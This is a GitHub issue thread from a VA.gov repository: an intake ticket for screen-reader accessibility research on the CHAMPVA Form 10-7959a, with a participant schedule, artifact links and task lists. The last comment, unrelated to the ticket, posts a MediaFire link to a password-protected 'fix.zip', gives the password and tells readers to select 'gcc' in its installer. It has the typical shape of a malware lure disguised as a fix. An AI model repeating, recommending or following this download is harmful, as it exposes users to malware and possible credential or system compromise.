### ISSUE TITLE
[CAIA A11y Research]: IVC Forms - CHAMPVA: Form 10-7959a (August & September 2024)

### ISSUE THREAD

**Issue by rachaelpenfil** [department-of-veterans-affairs/va.gov-team#91427]
> [!NOTE]
> **High-Level Overview**: `IVC Forms - CHAMPVA`
> - **Research Timeframe**: Aug. 27-~30~ Sept. 5, 2024
> - **Time of Day:** 9-7 EST
> - **CAIA AT Pilot**: Not completed, due to timing of the research start date
> - **Assistive Tech Users**: `3` AT Users (recruiting `8`)
>     - Source of Truth: `ivc-forms slack` [refer to Slack thread](https://dsva.slack.com/archives/C05UDS77ZPH/p1724765663950449) 🧵 
> - **Artifacts Available**: 8/26/2024
> - **Testing Environment:** [Staging](https://staging.va.gov/family-and-caregiver-benefits/health-and-disability/file-champva-claim-10-7959a)
> - **Assistive Tech Being Used**:  Screen Readers 
>     - Verified screen reader users willing to use their assistive technology throughout the entire form process.
>     - Screen Readers (`3`)
> - **Task Lists**: See task lists for next steps/definition of done

## CAIA Assignee(s)

<details><summary>Toggle to view information about the CAIA Team.</summary>

- CAIA a11y `TBD`
- CAIA a11y `TBD`

</details>

## About the Team

<details><summary>Toggle to view information about the team.</summary>

- Team name: Rachael Penfil
- OCTO-DE product owner: Premal Shah
- Product manager: Mary Wang
- Designer: Syd Hoeper
- FE engineer: Michael Clement
- Product/team Slack channel: ivc-forms, ivc-forms-ux

</details>

## Accessibility Research Questions

- [ ] Can any major accessibility issues be identified at this point in the development process through questions and observations?
- [ ] Is the form’s plain language effective and accessible?

## Research Sessions

August 27 - 30, 2024

> [!TIP]
> - Providing CAIA A11ys with the time slots in advance for AT users, will allow a11ys to avoid conflicts on the CAIA A11y Capacity Calendar, and reach out to other a11ys, should CAIA not be available. 
> - Providing CAIA A11ys with the technology and devices the users will be testing with, will allow CAIA to prepare in advance for the sessions. 

<details><summary>Toggle to view research timing information.</summary>

### Timeframe

- **CAIA Pilot Session**:  `NONE`

### Length of sessions

- **Session length:** `60` minutes
- **Buffer time between sessions:** `30` minutes - `1` hour
- **Maximum sessions per day:** `4`

</details>

###  Testing Schedule

CAIA A11Ys will be looking for device and AT information. We realize that some of this information will not be available until the day of the session. 

[Source of Truth for Scheduling] - `PENDING`

Please toggle and use the following table to enter the following information for each participant: Date and Time, Assistive tech (AT), Device and Operating System, Browser, and Skill level:

<details><summary>Toggle to view the AT testing schedule</summary>

P# | Date and Time (ET) | AT | Device and OS | Browser | Skill | CAIA A11ys Available | STATUS
------------------|------------------|--------------|--------------|--------------|--------------|--------------|--------------
P2  | 8/27/24, 11:30 a.m. -12:30 p.m. `no-show` | VoiceOver | Tablet; iPadOS | Safari, Chrome, etc. `TBD` | Novice, Intermediate, Advanced `TBD` | @coforma-jamie | `NO SHOW`
P9 | 9/4/24, 1:30-2:30 pm `not an AT user, dismissed` | VoiceOver | Tablet; iPadOS | Safari, Chrome, etc. `TBD` | Novice, Intermediate, Advanced `TBD` | @coforma-jamie | `NON-AT USER`
P10 | 9/5/24, 10:00-11:00 am | VoiceOver | Tablet; iPadOS | Safari, Chrome, etc. `TBD` | Novice, Intermediate, Advanced `TBD` | @sara-amanda  |  `NON-AT USER`
P11 | 9/5/24, 11:30 am - 12:30 pm `used Read Aloud, not an SR - session dismissed` | ~~TalkBack~~ Read Aloud | ~~Tablet; Android~~ Desktop; Windows | Edge | Advanced | @coforma-jamie  | `NON AT-USER`
P12 | 9/5/24, 1:00 - 2:00 pm | NVDA | Desktop; Windows | Chrome | Novice, Intermediate, Advanced `TBD` | @EvanAtCoforma  | `COMPLETE`

- **Consideration**: You can also consider asking participants more specific AT and device combinations. 
- **For instance:** TalkBack on Samsung Galaxy 8, or VoiceOver on iPad with magnification.

</details>

**_CAIA A11ys will review the coverage needed, and self-assign, based on a11y availability._**

## Supporting artifacts 

<details><summary>Toggle to view the supporting artifacts</summary>

- [Product outline](https://github.com/department-of-veterans-affairs/va.gov-team/blob/master/products/health-care/champva/10-7959a/product-outline-10-7959a.md)
- [Prototype in Staging](https://staging.va.gov/family-and-caregiver-benefits/health-and-disability/file-champva-claim-10-7959a)
- [Research plan](https://github.com/department-of-veterans-affairs/va.gov-team/blob/master/products/health-care/champva/10-7959a/user-research/Research-Plan-for-Integrated-Veteran-Care-(IVC)-Team%2C-Form-10-7959a%2C-August-1st.md)
- [Research conversation guide](https://github.com/department-of-veterans-affairs/va.gov-team/blob/master/products/health-care/champva/10-7959a/user-research/Conversation-Guide-for-Integrated-Veteran-Care-(IVC)-Team%2C-Form-10-7959a%2C-August-1st.md)
- [User flows](Insert URL here between the parenthesis) - `PENDING`
- [Epics/issue that may be helpful](Insert URL here between the parenthesis)
</details>

<details><summary>Toggle to view more intake research ticket information</summary>

### Do you have an accessibility champion?

Yes, we have a champion

### If you have an accessibility champion, what's their name?

Rachael Penfil

### Calendar checking

- [X] Based on this calendar, confirm we have specialists who can support your study in your desired timeframe
- [ ] Confirm you are filing this support ticket at least 1 week in advance of said timeframe, so we have enough heads up to provide support

### Have you reviewed the CAIA capacity calendar?

- [X] Yes, we have reviewed the CAIA capacity calendar and can confirm specialists are available to support in our research timeframe

### When is the timeframe for your testing?

Aug 26-30

</details>

## Next Steps: Definition of Done

```[tasklist]
### CAIA A11Y Tasks
- [x] **INTAKE TICKET:** @sara-amanda to process intake ticket
- [x] **CALENDAR HOLDS** Update A11y [CAIA Capacity Calendar](https://calendar.google.com/calendar/u/0/embed?src=c_f982350fc73a8162a1088ab14d00dd37335b2b559a60d6b67eb8021416f81c2a@group.calendar.google.com&ctz=America/Chicago) with holds for user research sessions with AT, when dates become available.
- [x] **REMOVE CALENDAR HOLDS** Remove holds on A11y [**CAIA Capacity Calendar**](https://calendar.google.com/calendar/u/0/embed?src=c_f982350fc73a8162a1088ab14d00dd37335b2b559a60d6b67eb8021416f81c2a@group.calendar.google.com&ctz=America/Chicago) and replace with invitations from project team (or Perigean)
- [x] **RESEARCH NOTES** Create [CAIA notes document](https://docs.google.com/document/d/1aD_m_yHkC5kH64s1hYBYD1qA7NKbL_xpwDT_J_CMrcg/edit?usp=sharing)
- [x] **Divvy user research session support among CAIA A11ys** - based on availability and technology available to support.
- [x] **Review research folder and assets**
- [x] **Participate in research** **Date Span:**`8/27/2024` and `8/30/2024` EXTENDED Due to recruitment and non-AT participants through `9/5/2024`
- [x] **SESSION NOTES**: Use [CAIA notes document](https://docs.google.com/document/d/1aD_m_yHkC5kH64s1hYBYD1qA7NKbL_xpwDT_J_CMrcg/edit?usp=sharing) during the sessions
- [ ] **SYNC:** Connect with CAIA A11ys on research findings (meeting)
- [ ] **Create/update the CAIA A11y Research Deliverable** This is dependent on the number of study participants CAIA supports. If minimal, A11Ys may share feedback only in the feedback Mural or this ticket.
- [ ] **Share the completed deliverable** with the project team via Slack: `Primary Team Slack` and `Ticket`
```

```[tasklist]
### VFS TEAM Tasks
- [x] Tag @Naomi Eke in Slack [#sitewide-content-accessibility-ia](https://dsva.slack.com/archives/C01K37HRUAH)
- [x] **PROTOTYPE:** Provide prototype to CAIA A11ys via this ticket in the supporting artifacts section 8/26/2024
- [x] **DATES NEEDED** See `Table` in the ticket above. Please provide date range - `RCVD` -  and slots - `PENDING` - for AT sessions being planned.
- [x] **ASSISTIVE TECH. INFO NEEDED:** Please provide the AT the users will be utilizing during the research sessions in `Table` in the ticket above.
- [ ] **AT Info:** AT Browser, skill level, years of use for AT to be asked during sessions
- [ ] **INVITES:** Forward invites from Perigean to CAIA A11ys (Sara)
```

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
